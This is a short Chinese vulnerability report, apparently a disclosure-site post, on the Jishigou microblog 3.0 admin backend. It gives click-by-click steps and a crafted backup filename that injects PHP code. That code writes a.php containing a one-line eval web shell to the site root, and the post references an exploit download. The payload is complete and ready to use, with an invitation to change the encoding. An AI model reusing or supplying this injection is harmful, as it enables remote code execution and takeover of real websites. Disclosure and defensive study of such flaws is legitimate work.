简要描述:
记事狗微博系统,后台存在设计缺陷,可导致进入后台者获得shell
详细说明:
1、系统工具->数据备份->自定义备份->选择一张数据量较小的表->更多选项->选择压缩备份文件->多分卷压缩成一个文件
2、在备份文件名中输入
');file_put_contents(base64_decode('YS5waHA='),base64_decode('PD9waHAgZXZhbCgkX1BPU1RbYV0pPz4='));('
备份成功就在网站根目录生成a.php,内容为
<?php eval($_POST[a])?>
其中base64_decode中编码自己改吧
漏洞证明:
EXP下载:记事狗微博3.0exp.rar(1059328 Byte)